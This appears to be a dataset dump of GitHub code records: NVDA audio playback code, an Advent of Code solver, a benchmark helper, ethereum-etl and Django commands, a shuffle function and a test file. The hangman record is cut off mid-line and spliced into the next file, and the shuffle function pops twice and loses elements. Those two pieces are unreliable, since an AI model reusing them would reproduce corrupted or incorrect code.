{preferredDevice}\"\r\n\t\t\t\tf\" Falling back to WAVE_MAPPER\"\r\n\t\t\t)\r\n\t\t\tself._setCurrentDevice(WAVE_MAPPER)\r\n\r\n\tdef _isPreferredDeviceOpen(self) -> bool:\r\n\t\tif self._waveout is None:\r\n\t\t\treturn False\r\n\t\tif _isDebugForNvWave():\r\n\t\t\tlog.debug(\r\n\t\t\t\tf\"preferred device: {self._preferredDeviceName}\"\r\n\t\t\t\tf\" current device name: {self._outputDeviceName} (id: {self._outputDeviceID})\"\r\n\t\t\t)\r\n\t\treturn self._outputDeviceName == self._preferredDeviceName\r\n\r\n\tdef _isPreferredDeviceAvailable(self) -> bool:\r\n\t\t\"\"\"\r\n\t\t@note: Depending on number of devices being fetched, this may take some time (~3ms)\r\n\t\t@return: True if the preferred device is available\r\n\t\t\"\"\"\r\n\t\tfor ID, name in _getOutputDevices():\r\n\t\t\tif name == self._preferredDeviceName:\r\n\t\t\t\tif _isDebugForNvWave():\r\n\t\t\t\t\tlog.debug(\"preferred Device is Available\")\r\n\t\t\t\treturn True\r\n\r\n\t\tif _isDebugForNvWave():\r\n\t\t\tlog.debug(\"preferred Device is not available\")\r\n\t\treturn False\r\n\r\n\tdef open(self):\r\n\t\t\"\"\"Open the output device.\r\n\t\tThis will be called automatically when required.\r\n\t\tIt is not an error if the output device is already open.\r\n\t\t\"\"\"\r\n\t\twith self._waveout_lock:\r\n\t\t\tif self._waveout:\r\n\t\t\t\treturn\r\n\t\t\tif _isDebugForNvWave():\r\n\t\t\t\tlog.debug(\r\n\t\t\t\t\tf\"Calling winmm.waveOutOpen.\"\r\n\t\t\t\t\tf\" outputDeviceName: {self._outputDeviceName}\"\r\n\t\t\t\t\tf\" outputDeviceID: {self._outputDeviceID}\"\r\n\t\t\t\t)\r\n\t\t\twfx = WAVEFORMATEX()\r\n\t\t\twfx.wFormatTag = WAVE_FORMAT_PCM\r\n\t\t\twfx.nChannels = self.channels\r\n\t\t\twfx.nSamplesPerSec = self.samplesPerSec\r\n\t\t\twfx.wBitsPerSample = self.bitsPerSample\r\n\t\t\twfx.nBlockAlign: int = self.bitsPerSample // 8 * self.channels\r\n\t\t\twfx.nAvgBytesPerSec = self.samplesPerSec * wfx.nBlockAlign\r\n\t\t\twaveout = HWAVEOUT(0)\r\n\t\t\ttry:\r\n\t\t\t\twith self._global_waveout_lock:\r\n\t\t\t\t\twinmm.waveOutOpen(\r\n\t\t\t\t\t\tbyref(waveout),\r\n\t\t\t\t\t\tself._outputDeviceID,\r\n\t\t\t\t\t\tLPWAVEFORMATEX(wfx),\r\n\t\t\t\t\t\tself._waveout_event,\r\n\t\t\t\t\t\t0,\r\n\t\t\t\t\t\tCALLBACK_EVENT\r\n\t\t\t\t\t)\r\n\t\t\texcept WindowsError:\r\n\t\t\t\tif _isDebugForNvWave():\r\n\t\t\t\t\tlog.debug(\r\n\t\t\t\t\t\tf\"Error opening\"\r\n\t\t\t\t\t\tf\" outputDeviceName: {self._outputDeviceName}\"\r\n\t\t\t\t\t\tf\" with id: {self._outputDeviceID}\"\r\n\t\t\t\t\t)\r\n\t\t\t\tif self._outputDeviceID != WAVE_MAPPER:\r\n\t\t\t\t\tif _isDebugForNvWave():\r\n\t\t\t\t\t\tlog.debug(f\"Falling back to WAVE_MAPPER\")\r\n\t\t\t\t\tself._setCurrentDevice(WAVE_MAPPER)\r\n\t\t\t\t\tself.open()\r\n\t\t\t\telse:\r\n\t\t\t\t\tlog.warning(f\"Unable to open WAVE_MAPPER device, there may be no audio devices.\")\r\n\t\t\t\t\traise # can't open the default device.\r\n\t\t\t\treturn\r\n\t\t\tself._waveout = waveout.value\r\n\t\t\tself._prev_whdr = None\r\n\r\n\tdef feed(\r\n\t\t\tself,\r\n\t\t\tdata: bytes,\r\n\t\t\tonDone: typing.Optional[typing.Callable] = None\r\n\t) -> None:\r\n\t\t\"\"\"Feed a chunk of audio data to be played.\r\n\t\tThis is normally synchronous.\r\n\t\tHowever, synchronisation occurs on the previous chunk, rather than the current chunk;\r\n\t\ti.e. calling this while no audio is playing will begin playing the chunk\r\n\t\tbut return immediately.\r\n\t\tThis allows for uninterrupted playback as long as a new chunk is fed before\r\n\t\tthe previous chunk has finished playing.\r\n\t\t@param data: Waveform audio in the format specified when this instance was constructed.\r\n\t\t@param onDone: Function to call when this chunk has finished playing.\r\n\t\t@raise WindowsError: If there was an error playing the audio.\r\n\t\t\"\"\"\r\n\t\tif not self._minBufferSize:\r\n\t\t\tself._feedUnbuffered_handleErrors(data, onDone=onDone)\r\n\t\t\treturn\r\n\t\tself._buffer += data\r\n\t\t# If onDone was specified, we must play audio regardless of the minimum buffer size\r\n\t\t# so we can accurately call onDone at the end of this chunk.\r\n\t\tif onDone or len(self._buffer) > self._minBufferSize:\r\n\t\t\tdata = self._buffer\r\n\t\t\tself._buffer = b\"\"\r\n\t\t\tself._feedUnbuffered_handleErrors(data, onDone=onDone)\r\n\r\n\tdef _feedUnbuffered_handleErrors(self, data, onDone=None) -> bool:\r\n\t\t\"\"\"Tries to feed the device, on error resets the device and tries again.\r\n\t\t@return: False if second attempt fails\r\n\t\t\"\"\"\r\n\t\ttry:\r\n\t\t\tself._feedUnbuffered(data, onDone=onDone)\r\n\t\t\treturn True\r\n\t\texcept WindowsError:\r\n\t\t\tlog.warning(\"Error during feed. Resetting the device.\")\r\n\t\t\ttry:\r\n\t\t\t\tself._close() # don't try to call stop on a \"broken\" device.\r\n\t\t\t\tself._setCurrentDevice(self._preferredDeviceName)\r\n\t\t\t\tself.open()\r\n\t\t\t\tself._feedUnbuffered(data, onDone=onDone)\r\n\t\t\texcept Exception:\r\n\t\t\t\tlog.debugWarning(\"Unable to send data to audio device on second attempt.\", exc_info=True)\r\n\t\t\t\treturn False\r\n\r\n\tdef _feedUnbuffered(self, data, onDone=None):\r\n\t\t\"\"\"\r\n\t\t@note: Raises WindowsError on invalid device (see winmm functions\r\n\t\t\"\"\"\r\n\t\tif self._audioDucker and not self._audioDucker.enable():\r\n\t\t\treturn\r\n\t\twhdr = WAVEHDR()\r\n\t\twhdr.lpData = data\r\n\t\twhdr.dwBufferLength = len(data)\r\n\t\twith self._lock:\r\n\t\t\twith self._waveout_lock:\r\n\t\t\t\tself.open() # required of close on idle see _idleUnbuffered\r\n\t\t\t\twith self._global_waveout_lock:\r\n\t\t\t\t\twinmm.waveOutPrepareHeader(self._waveout, LPWAVEHDR(whdr), sizeof(WAVEHDR))\r\n\t\t\t\t\twinmm.waveOutWrite(self._waveout, LPWAVEHDR(whdr), sizeof(WAVEHDR))\r\n\t\t\tself.sync()\r\n\t\t\tself._prev_whdr = whdr\r\n\t\t\t# Don't call onDone if stop was called,\r\n\t\t\t# as this chunk has been truncated in that case.\r\n\t\t\tif self._prevOnDone is not self.STOPPING:\r\n\t\t\t\tself._prevOnDone = onDone\r\n\r\n\tdef sync(self):\r\n\t\t\"\"\"Synchronise with playback.\r\n\t\tThis method blocks until the previously fed chunk of audio has finished playing.\r\n\t\tIt is called automatically by L{feed}, so usually need not be called directly by the user.\r\n\t\t\"\"\"\r\n\t\twith self._lock:\r\n\t\t\tif not self._prev_whdr:\r\n\t\t\t\treturn\r\n\t\t\tassert self._waveout, \"waveOut None before wait\"\r\n\t\t\twhile not (self._prev_whdr.dwFlags & WHDR_DONE):\r\n\t\t\t\twinKernel.waitForSingleObject(self._waveout_event, winKernel.INFINITE)\r\n\t\t\twith self._waveout_lock:\r\n\t\t\t\tassert self._waveout, \"waveOut None after wait\"\r\n\t\t\t\twith self._global_waveout_lock:\r\n\t\t\t\t\twinmm.waveOutUnprepareHeader(self._waveout, LPWAVEHDR(self._prev_whdr), sizeof(WAVEHDR))\r\n\t\t\tself._prev_whdr = None\r\n\t\t\tif self._prevOnDone is not None and self._prevOnDone is not self.STOPPING:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tself._prevOnDone()\r\n\t\t\t\texcept:\r\n\t\t\t\t\tlog.exception(\"Error calling onDone\")\r\n\t\t\t\tself._prevOnDone = None\r\n\r\n\tdef pause(self, switch):\r\n\t\t\"\"\"Pause or unpause playback.\r\n\t\t@param switch: C{True} to pause playback, C{False} to unpause.\r\n\t\t@type switch: bool\r\n\t\t\"\"\"\r\n\t\tif self._audioDucker and self._waveout:\r\n\t\t\tif switch:\r\n\t\t\t\tself._audioDucker.disable()\r\n\t\t\telse:\r\n\t\t\t\tself._audioDucker.enable()\r\n\t\twith self._waveout_lock:\r\n\t\t\tif not self._waveout:\r\n\t\t\t\treturn\r\n\t\t\tif switch:\r\n\t\t\t\twith self._global_waveout_lock:\r\n\t\t\t\t\twinmm.waveOutPause(self._waveout)\r\n\t\t\telse:\r\n\t\t\t\twith self._global_waveout_lock:\r\n\t\t\t\t\twinmm.waveOutRestart(self._waveout)\r\n\r\n\tdef idle(self):\r\n\t\t\"\"\"Indicate that this player is now idle; i.e. the current continuous segment of audio is complete.\r\n\t\tThis will first call L{sync} to synchronise with playback.\r\n\t\tIf L{closeWhenIdle} is C{True}, the output device will be closed.\r\n\t\tA subsequent call to L{feed} will reopen it.\r\n\t\t\"\"\"\r\n\t\tif not self._minBufferSize:\r\n\t\t\treturn self._idleUnbuffered()\r\n\t\tif self._buffer:\r\n\t\t\tbuffer = self._buffer\r\n\t\t\tself._buffer = b\"\"\r\n\t\t\tself._feedUnbuffered_handleErrors(buffer)\r\n\r\n\t\treturn self._idleUnbuffered()\r\n\r\n\tdef _idleUnbuffered(self):\r\n\t\twith self._lock:\r\n\t\t\tself.sync()\r\n\t\t\twith self._waveout_lock:\r\n\t\t\t\tif not self._waveout:\r\n\t\t\t\t\treturn\r\n\t\t\t\tif self.closeWhenIdle:\r\n\t\t\t\t\tif _isDebugForNvWave():\r\n\t\t\t\t\t\tlog.debug(\"Closing due to idle.\")\r\n\t\t\t\t\tself._close() # Idle so no need to call stop.\r\n\t\t\t\telse:\r\n\t\t\t\t\twith self._global_waveout_lock:\r\n\t\t\t\t\t\tif not self._isPreferredDeviceOpen() and self._isPreferredDeviceAvailable():\r\n\t\t\t\t\t\t\tif _isDebugForNvWave():\r\n\t\t\t\t\t\t\t\tlog.debug(\"Attempt re-open of preferred device.\")\r\n\t\t\t\t\t\t\tself._close() # Idle so no need to call stop.\r\n\t\t\t\t\t\t\tself._setCurrentDevice(self._preferredDeviceName)\r\n\t\t\t\t\t\t\tself.open()\r\n\t\t\tif self._audioDucker: self._audioDucker.disable()\r\n\r\n\tdef stop(self):\r\n\t\t\"\"\"Stop playback.\r\n\t\t\"\"\"\r\n\t\tif self._audioDucker: self._audioDucker.disable()\r\n\t\tif self._minBufferSize:\r\n\t\t\tself._buffer = b\"\"\r\n\t\twith self._waveout_lock:\r\n\t\t\tif not self._waveout:\r\n\t\t\t\treturn\r\n\t\t\tself._prevOnDone = self.STOPPING\r\n\t\t\ttry:\r\n\t\t\t\twith self._global_waveout_lock:\r\n\t\t\t\t\t# Pausing first seems to make waveOutReset respond faster on some systems.\r\n\t\t\t\t\twinmm.waveOutPause(self._waveout)\r\n\t\t\t\t\twinmm.waveOutReset(self._waveout)\r\n\t\t\texcept WindowsError:\r\n\t\t\t\t# waveOutReset seems to fail randomly on some systems.\r\n\t\t\t\tpass\r\n\t\t# Unprepare the previous buffer and close the output device if appropriate.\r\n\t\tself._idleUnbuffered()\r\n\t\tself._prevOnDone = None\r\n\r\n\tdef close(self):\r\n\t\t\"\"\"Close the output device.\r\n\t\t\"\"\"\r\n\t\tself.stop()\r\n\t\twith self._lock:\r\n\t\t\twith self._waveout_lock:\r\n\t\t\t\tif not self._waveout:\r\n\t\t\t\t\treturn\r\n\t\t\t\tself._close()\r\n\r\n\tdef _close(self):\r\n\t\tif _isDebugForNvWave():\r\n\t\t\tlog.debug(\"Calling winmm.waveOutClose\")\r\n\t\twith self._global_waveout_lock:\r\n\t\t\tif not self._waveout:\r\n\t\t\t\treturn\r\n\t\t\ttry:\r\n\t\t\t\twinmm.waveOutClose(self._waveout)\r\n\t\t\texcept WindowsError:\r\n\t\t\t\tlog.debug(\"Error closing the device, it may have been removed.\", exc_info=True)\r\n\t\tself._waveout = None\r\n\r\n\tdef __del__(self):\r\n\t\tself.close()\r\n\t\twinKernel.kernel32.CloseHandle(self._waveout_event)\r\n\t\tself._waveout_event = None\r\n\t\tsuper().__del__()\r\n\r\n\r\ndef _getOutputDevices():\r\n\t\"\"\"Generator, returning device ID and device Name in device ID order.\r\n\t\t@note: Depending on number of devices being fetched, this may take some time (~3ms)\r\n\t\"\"\"\r\n\tcaps = WAVEOUTCAPS()\r\n\tfor devID in range(-1, winmm.waveOutGetNumDevs()):\r\n\t\ttry:\r\n\t\t\twinmm.waveOutGetDevCapsW(devID, byref(caps), sizeof(caps))\r\n\t\t\tyield devID, caps.szPname\r\n\t\texcept WindowsError:\r\n\t\t\t# It seems that in certain cases, Windows includes devices which cannot be accessed.\r\n\t\t\tpass\r\n\r\n\r\ndef getOutputDeviceNames():\r\n\t\"\"\"Obtain the names of all audio output devices on the system.\r\n\t@return: The names of all output devices on the system.\r\n\t@rtype: [str, ...]\r\n\t@note: Depending on number of devices being fetched, this may take some time (~3ms)\r\n\t\"\"\"\r\n\treturn [name for ID, name in _getOutputDevices()]\r\n\r\ndef outputDeviceIDToName(ID):\r\n\t\"\"\"Obtain the name of an output device given its device ID.\r\n\t@param ID: The device ID.\r\n\t@type ID: int\r\n\t@return: The device name.\r\n\t@rtype: str\r\n\t\"\"\"\r\n\tcaps = WAVEOUTCAPS()\r\n\ttry:\r\n\t\twinmm.waveOutGetDevCapsW(ID, byref(caps), sizeof(caps))\r\n\texcept WindowsError:\r\n\t\traise LookupError(\"No such device ID\")\r\n\treturn caps.szPname\r\n\r\n\r\ndef outputDeviceNameToID(name: str, useDefaultIfInvalid=False) -> int:\r\n\t\"\"\"Obtain the device ID of an output device given its name.\r\n\t@param name: The device name.\r\n\t@param useDefaultIfInvalid: C{True} to use the default device (wave mapper) if there is no such device,\r\n\t\tC{False} to raise an exception.\r\n\t@return: The device ID.\r\n\t@raise LookupError: If there is no such device and C{useDefaultIfInvalid} is C{False}.\r\n\t@note: Depending on number of devices, and the position of the device in the list,\r\n\tthis may take some time (~3ms)\r\n\t\"\"\"\r\n\tfor curID, curName in _getOutputDevices():\r\n\t\tif curName == name:\r\n\t\t\treturn curID\r\n\r\n\t# No such ID.\r\n\tif useDefaultIfInvalid:\r\n\t\treturn WAVE_MAPPER\r\n\telse:\r\n\t\traise LookupError(\"No such device name\")\r\n\r\nfileWavePlayer = None\r\nfileWavePlayerThread=None\r\ndef playWaveFile(fileName, asynchronous=True):\r\n\t\"\"\"plays a specified wave file.\r\n\t@param asynchronous: whether the wave file should be played asynchronously\r\n\t@type asynchronous: bool\r\n\t\"\"\"\r\n\tglobal fileWavePlayer, fileWavePlayerThread\r\n\tf = wave.open(fileName,\"r\")\r\n\tif f is None: raise RuntimeError(\"can not open file %s\"%fileName)\r\n\tif fileWavePlayer is not None:\r\n\t\tfileWavePlayer.stop()\r\n\tfileWavePlayer = WavePlayer(\r\n\t\tchannels=f.getnchannels(),\r\n\t\tsamplesPerSec=f.getframerate(),\r\n\t\tbitsPerSample=f.getsampwidth() * 8,\r\n\t\toutputDevice=config.conf[\"speech\"][\"outputDevice\"],\r\n\t\twantDucking=False\r\n\t)\r\n\tfileWavePlayer.feed(f.readframes(f.getnframes()))\r\n\tif asynchronous:\r\n\t\tif fileWavePlayerThread is not None:\r\n\t\t\tfileWavePlayerThread.join()\r\n\t\tfileWavePlayerThread = threading.Thread(\r\n\t\t\tname=f\"{__name__}.playWaveFile({os.path.basename(fileName)})\",\r\n\t\t\ttarget=fileWavePlayer.idle\r\n\t\t)\r\n\t\tfileWavePlayerThread.start()\r\n\telse:\r\n\t\tfileWavePlayer.idle()\r\n\r\n# When exiting, ensure fileWavePlayer is deleted before modules get cleaned up.\r\n# Otherwise, WavePlayer.__del__ will fail with an exception.\r\n@atexit.register\r\ndef _cleanup():\r\n\tglobal fileWavePlayer, fileWavePlayerThread\r\n\tfileWavePlayer = None\r\n\tfileWavePlayerThread = None\r\n","repo_name":"falsecz/python-java-access-bridge","sub_path":"source/nvwave.py","file_name":"nvwave.py","file_ext":"py","file_size_in_byte":19823,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"70"}
+{"seq_id":"22767115473","text":"\r\nimport random\r\nword_list = [\"aardvark\", \"baboon\", \"camel\"]\r\nchosen_word = random.choice(word_list)\r\nword_length = len(chosen_word)\r\n\r\n#Testing code\r\nprint(f'Pssst, the solution is {chosen_word}.')\r\n\r\n#Create blanks\r\ndisplay = []\r\nfor _ in range(word_length):\r\n display += \"_\"\r\n\r\n_seq=0\r\nwhile not display.index(\"_\") and _seq\")\n\ni = 0\nfor idx, pad in pads(salt, False):\n i += 1\n if i == 64:\n print(\" - The 64th key index (without key-stretching) is {} -\".format(idx))\n break\n \ni = 0\nfor idx, pad in pads(salt, True):\n i += 1\n if i == 64:\n print(\" - The 64th key index (with key-stretching) is {} -\".format(idx))\n break\n","repo_name":"xSke/aoc16","sub_path":"day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"5358850332","text":"import glob\nimport multiprocessing\nimport os\nimport time\nimport warnings\nfrom multiprocessing import Process\nfrom typing import Tuple, List\n\nimport click\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport psutil\nfrom hbutils.scale import size_to_bytes_str\nfrom hbutils.string import ordinalize, plural_word\nfrom matplotlib.ticker import FuncFormatter\nfrom tqdm.auto import tqdm\n\nfrom conf import PROJ_DIR\nfrom plot import INCHES_TO_PIXELS\n\n_DEFAULT_IMAGE_POOL = glob.glob(os.path.join(PROJ_DIR, 'test', 'testfile', 'dataset', '**', '*.jpg'), recursive=True)\n\n\nclass BaseBenchmark:\n def __init__(self):\n self.all_images = _DEFAULT_IMAGE_POOL\n\n def prepare(self):\n pass\n\n def load(self):\n raise NotImplementedError\n\n def unload(self):\n raise NotImplementedError\n\n def run(self):\n raise NotImplementedError\n\n def run_benchmark(self, run_times):\n logs = []\n current_process = psutil.Process()\n\n def _record(name):\n logs.append((name, current_process.memory_info().rss, time.time()))\n\n # make sure the model is downloaded\n self.prepare()\n self.load()\n self.unload()\n\n _record('')\n\n self.load()\n _record('')\n\n for i in tqdm(range(run_times)):\n self.run()\n _record(f'#{i + 1}')\n\n self.unload()\n _record('')\n\n mems = np.array([mem for _, mem, _ in logs])\n mems -= mems[0]\n times = np.array([time_ for _, _, time_ in logs])\n times -= times[0]\n times[1:] = times[1:] - times[:-1]\n labels = np.array([name for name, _, _ in logs])\n\n return mems, times, labels\n\n def _run_in_subprocess_share(self, run_times, ret):\n ret['retval'] = self.run_benchmark(run_times)\n\n def run_in_subprocess(self, run_times: int = 10, try_times: int = 10):\n manager = multiprocessing.Manager()\n full_deltas, full_times, final_labels = [], [], None\n for i in tqdm(range(try_times)):\n ret = manager.dict()\n p = Process(target=self._run_in_subprocess_share, args=(run_times, ret,))\n p.start()\n p.join()\n if p.exitcode != 0:\n raise ChildProcessError(f'Exitcode {p.exitcode} in {self!r}\\'s {ordinalize(i + 1)} try.')\n\n mems, times, labels = ret['retval']\n deltas = mems[1:] - mems[:-1]\n full_deltas.append(deltas)\n full_times.append(times)\n if final_labels is None:\n final_labels = labels\n\n deltas = np.stack(full_deltas).mean(axis=0)\n final_mems = np.cumsum([0, *deltas])\n final_times = np.stack(full_times).mean(axis=0)\n\n return final_mems, final_times, final_labels\n\n\ndef create_plot_cli(items: List[Tuple[str, BaseBenchmark]],\n title: str = 'Unnamed Benchmark Plot', run_times=15, try_times=10,\n mem_ylog: bool = False, time_ylog: bool = False,\n figsize=(1080, 600), dpi: int = 300):\n def fmt_size(x, pos):\n _ = pos\n warnings.filterwarnings('ignore')\n return size_to_bytes_str(x, precision=1)\n\n def fmt_time(x, pos):\n _ = pos\n if x < 1e-6:\n return f'{x * 1e9:.1f}ns'\n elif x < 1e-3:\n return f'{x * 1e6:.1f}μs'\n elif x < 1:\n return f'{x * 1e3:.1f}ms'\n else:\n return f'{x * 1.0:.1f}s'\n\n @click.command()\n @click.option('--output', '-o', 'save_as', type=click.Path(dir_okay=False), required=True,\n help='Output path of image file.', show_default=True)\n def _execute(save_as):\n fig, axes = plt.subplots(1, 2, figsize=(figsize[0] / INCHES_TO_PIXELS, figsize[1] / INCHES_TO_PIXELS))\n\n if mem_ylog:\n axes[0].set_yscale('log')\n axes[0].yaxis.set_major_formatter(FuncFormatter(fmt_size))\n axes[0].set_title('Memory Benchmark')\n axes[0].set_ylabel('Memory Usage')\n\n if time_ylog:\n axes[1].set_yscale('log')\n axes[1].yaxis.set_major_formatter(FuncFormatter(fmt_time))\n axes[1].set_title('Performance Benchmark (CPU)')\n axes[1].set_ylabel('Time Cost')\n\n labeled = False\n\n for name, bm in tqdm(items):\n mems, times, labels = bm.run_in_subprocess(run_times, try_times)\n axes[0].plot(mems, label=name)\n axes[1].plot(times, label=name)\n if not labeled:\n axes[0].set_xticks(range(len(labels)), labels, rotation='vertical')\n axes[1].set_xticks(range(len(labels)), labels, rotation='vertical')\n labeled = True\n\n axes[0].legend()\n axes[0].grid()\n axes[1].legend()\n axes[1].grid()\n\n fig.suptitle(f'{title}\\n'\n f'(Mean of {plural_word(try_times, \"try\")}, '\n f'run for {plural_word(run_times, \"time\")})')\n\n fig.tight_layout()\n plt.savefig(save_as, bbox_inches='tight', dpi=dpi, transparent=True)\n\n return _execute\n","repo_name":"deepghs/imgutils","sub_path":"docs/source/_libs/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":5081,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"70"}
+{"seq_id":"15301676902","text":"import click\nimport csv\nimport json\n\nfrom ethereumetl.csv_utils import set_max_field_size_limit\nfrom blockchainetl.file_utils import smart_open\nfrom blockchainetl.jobs.exporters.converters.int_to_string_item_converter import IntToStringItemConverter\nfrom ethereumetl.jobs.exporters.token_transfers_item_exporter import token_transfers_item_exporter\nfrom ethereumetl.jobs.extract_token_transfers_job import ExtractTokenTransfersJob\nfrom blockchainetl.logging_utils import logging_basic_config\n\nlogging_basic_config()\n\nset_max_field_size_limit()\n\n@click.command(context_settings=dict(help_option_names=['-h', '--help']))\n@click.option('-l', '--logs', type=str, required=True, help='The CSV file containing receipt logs.')\n@click.option('-b', '--batch-size', default=100, show_default=True, type=int, help='The number of blocks to filter at a time.')\n@click.option('-o', '--output', default='-', show_default=True, type=str, help='The output file. If not specified stdout is used.')\n@click.option('-w', '--max-workers', default=5, show_default=True, type=int, help='The maximum number of workers.')\n@click.option('--values-as-strings', default=False, show_default=True, is_flag=True, help='Whether to convert values to strings.')\ndef extract_token_transfers(logs, batch_size, output, max_workers, values_as_strings=False):\n \"\"\"Extracts ERC20/ERC721 transfers from logs file.\"\"\"\n with smart_open(logs, 'r') as logs_file:\n if logs.endswith('.json'):\n logs_reader = (json.loads(line) for line in logs_file)\n else:\n logs_reader = csv.DictReader(logs_file)\n converters = [IntToStringItemConverter(keys=['value'])] if values_as_strings else []\n job = ExtractTokenTransfersJob(\n logs_iterable=logs_reader,\n batch_size=batch_size,\n max_workers=max_workers,\n item_exporter=token_transfers_item_exporter(output, converters=converters))\n\n job.run()\n","repo_name":"blockchain-etl/ethereum-etl","sub_path":"ethereumetl/cli/extract_token_transfers.py","file_name":"extract_token_transfers.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":2722,"dataset":"github-code","pt":"70"}
+{"seq_id":"21104824591","text":"from datetime import datetime, timedelta\nimport os\nimport pdb\nfrom textwrap import indent\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\nfrom deviant import DeviantArt\nfrom data.models import *\nimport json\nimport pickle\nfrom requests_oauthlib import OAuth2Session\nfrom django.conf import settings\nfrom data.models import *\nimport logging\nfrom data import tasks\nlogger = logging.getLogger(__name__)\nBASE_URL = 'https://www.deviantart.com/api/v1/oauth2'\n\n\nclass Command(BaseCommand):\n help = ''\n\n def __authorize(self, user):\n \"\"\"\n docstring\n \"\"\"\n extra = {\n 'client_id': settings.DA_CLIENT_ID,\n 'client_secret': settings.DA_CLIENT_SECRET,\n }\n\n def token_updater(token):\n user.token = token\n user.save()\n\n self.deviant = OAuth2Session(\n client_id=settings.DA_CLIENT_ID,\n token=user.token,\n auto_refresh_kwargs=extra,\n auto_refresh_url=settings.DA_TOKEN_URL,\n token_updater=token_updater\n )\n\n def __init__(self, *args, **kwargs):\n pass\n\n def add_arguments(self, parser):\n parser.add_argument(\"--fetch-deviations\", action='store_true')\n parser.add_argument(\"--process-competitors\", action='store_true')\n\n parser.add_argument(\"--process-favors\", action='store_true')\n parser.add_argument(\"--fetch-watchers\", action='store_true')\n parser.add_argument(\"--prepare-messages\", action='store_true')\n parser.add_argument(\"--do-send\", action='store_true')\n\n def __savejson(self, obj, filename):\n \"\"\"\n docstring\n \"\"\"\n fullname = os.path.join(\"./responses\", filename)\n with open(fullname, 'wt') as outfile:\n outfile.write(json.dumps(obj, indent=2))\n\n def __populate_profiles(self):\n \"\"\"\n docstring\n \"\"\"\n # profile = da.get_profile(w['user']['username'])\n # if profile:\n # if 'stats' in profile:\n # obj.pageview_count = profile['stats']['profile_pageviews']\n # obj.deviations_count = profile['stats']['user_deviations']\n # if 'stats' in profile['user']:\n # obj.watchers_count = profile['user']['stats']['watchers']\n # # self.__savejson(profile, \"./responses/profile.json\")\n # obj.save()\n pass\n\n def __fetch_watchers(self):\n \"\"\"\n docstring\n \"\"\"\n logger.info(\"Fetching watchers...\")\n\n da_username = settings.DA_USERNAME\n dj_user = User.objects.filter(da_username=da_username).first()\n\n da = DeviantArt(dj_user)\n\n watchers = da.list_watchers(da_username)\n for w in watchers:\n obj, created = DAUser.objects.update_or_create(\n username=w['user']['username'], defaults={\n \"user\": dj_user,\n \"userid\": w['user'].get('userid')\n })\n\n def handle(self, *args, **options):\n if options.get('fetch_watchers'):\n self.__fetch_watchers()\n\n if options.get('fetch_deviations'):\n tasks.cycle_deviations()\n if options.get('prepare_messages'):\n tasks.cycle_prepmsg()\n if options['do_send']:\n tasks.cycle_sender()\n if options['process_competitors']:\n logger.info(\"Processing competitors...\")\n tasks.cycle_competitor()\n","repo_name":"Aqudei/deviant","sub_path":"data/management/commands/da.py","file_name":"da.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"33526416145","text":"import random\n\ndef fisher_yates_shuffle(array):\n \"\"\"Return a new array of random words poped from inputted dictionary\"\"\"\n shuffled_arr = []\n while array:\n popped_word = array.pop(random.randint(0,len(array)-1))\n shuffled_arr.append(array.pop(random.randint(0,len(array)-1)))\n return shuffled_arr\n\n\narr = \"this is the random arr that i would like to shuffle\".split()\nnew_arr = fisher_yates_shuffle(arr)\nprint(new_arr)\n\n","repo_name":"ajboxjr/CS-2-Tweet-Generator","sub_path":"class1/yates-shuffle.py","file_name":"yates-shuffle.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"27953206824","text":"\"\"\"\nTests for the Cornerstone content metadata transmitter.\n\"\"\"\n\nimport unittest\nfrom datetime import datetime\nfrom unittest import mock\n\nfrom pytest import mark\n\nfrom integrated_channels.cornerstone.transmitters.content_metadata import CornerstoneContentMetadataTransmitter\nfrom integrated_channels.integrated_channel.models import ContentMetadataItemTransmission\nfrom test_utils import factories\n\n\n@mark.django_db\nclass TestCornerstoneContentMetadataTransmitter(unittest.TestCase):\n \"\"\"\n Tests for the class ``CornerstoneContentMetadataTransmitter``.\n \"\"\"\n\n def setUp(self):\n super().setUp()\n enterprise_customer = factories.EnterpriseCustomerFactory(name='Starfleet Academy')\n self.enterprise_customer_catalog = factories.EnterpriseCustomerCatalogFactory(\n enterprise_customer=enterprise_customer\n )\n self.enterprise_config = factories.CornerstoneEnterpriseCustomerConfigurationFactory(\n enterprise_customer=enterprise_customer\n )\n\n # @mock.patch('integrated_channels.cornerstone.transmitter.content_metadata._log_info')\n def test_cornerstone_transmitter_transmit_method_noop(self):\n record = factories.ContentMetadataItemTransmissionFactory(\n enterprise_customer=self.enterprise_config.enterprise_customer,\n plugin_configuration_id=self.enterprise_config.id,\n integrated_channel_code=self.enterprise_config.channel_code(),\n remote_created_at=datetime.utcnow(),\n remote_updated_at=None,\n )\n transmitter = CornerstoneContentMetadataTransmitter(self.enterprise_config)\n transmitter._log_info = mock.MagicMock() # pylint: disable=protected-access\n\n transmitter.transmit({record.content_id: record}, {}, {})\n transmitter._log_info.assert_called_with( # pylint: disable=protected-access\n f'Cornerstone base transmission invoked for config: {self.enterprise_config.id}. Treating as a NOOP'\n )\n\n def test_transmit_content_metadata_updates_records(self):\n \"\"\"\n Test that the Cornerstone content metadata transmitter transmit for web method generates and updates the\n appropriate content records as well as returns a transmit payload of both update and create content.\n \"\"\"\n self.enterprise_config.transmission_chunk_size = 3\n self.enterprise_config.save()\n content_id_1 = 'content_id_1'\n content_id_2 = 'content_id_2'\n content_id_3 = 'content_id_3'\n past_transmission_to_update = factories.ContentMetadataItemTransmissionFactory(\n content_id=content_id_1,\n enterprise_customer=self.enterprise_config.enterprise_customer,\n plugin_configuration_id=self.enterprise_config.id,\n integrated_channel_code=self.enterprise_config.channel_code(),\n content_last_changed='2021-07-16T15:11:10.521611Z',\n enterprise_customer_catalog_uuid=self.enterprise_customer_catalog.uuid,\n 